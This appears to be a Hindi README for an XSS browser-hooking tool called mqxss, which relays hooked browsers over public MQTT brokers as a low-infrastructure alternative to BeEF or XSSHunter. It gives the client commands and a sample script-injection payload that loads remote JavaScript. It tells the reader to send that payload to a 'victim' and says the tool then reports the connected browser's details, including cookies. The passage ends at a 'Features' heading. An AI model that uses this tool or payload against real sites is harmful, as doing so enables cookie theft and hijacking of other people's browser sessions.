
MQTT के माध्यम से हुक्ड ब्राउज़र संचार

beef या xsshunter की तुलना में इसका उपयोग करने का लाभ यह है कि js payload होस्ट करने के अलावा कोई infra सेटअप नहीं है, आप एक public broker उपयोग कर सकते हैं (हालाँकि वर्तमान में यह obfuscation का उपयोग करता है, encryption काम में है)।
हुक किए गए ब्राउज़र आपके द्वारा निर्दिष्ट broker पर MQTT topic में संवाद करेंगे, इसके साथ परीक्षण करने के लिए कई public/free brokers उपलब्ध हैं।
क्लाइंट python paho.mqtt लाइब्रेरी का उपयोग करता है जबकि js payload 'mqttws31.min.js' का उपयोग करता है जिसे वह यहाँ से लेता है 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'।

ब्राउज़रों को हुक करने के लिए JS payload जनरेट करने हेतु runtime पर -g फ्लैग को अपने broker, port और topic वेरिएबल्स के साथ सेट करें। ऐसा करने पर आपका payload /js/ फ़ोल्डर में बन जाएगा।
क्लाइंट चलाने के लिए अपना broker, port और topic इस प्रकार प्रदान करें:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
क्रेडेंशियल्स के साथ क्लाइंट चलाने के लिए अपना broker, port, user name, password और topic इस प्रकार प्रदान करें:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
अपना XSS payload पीड़ित को भेजें जबकि mqxss क्लाइंट चल रहा हो, उदा: '"><script src=https://example.com/x.js async></script> या ऐसा ही कुछ, यदि vulnerable है तो आपको एक सूचना मिलनी चाहिए जिसमें बताया गया हो कि ब्राउज़र कनेक्ट हो गया है और कुकीज़ आदि सहित कुछ बुनियादी विवरण मौजूद हैं।

विशेषताएँ: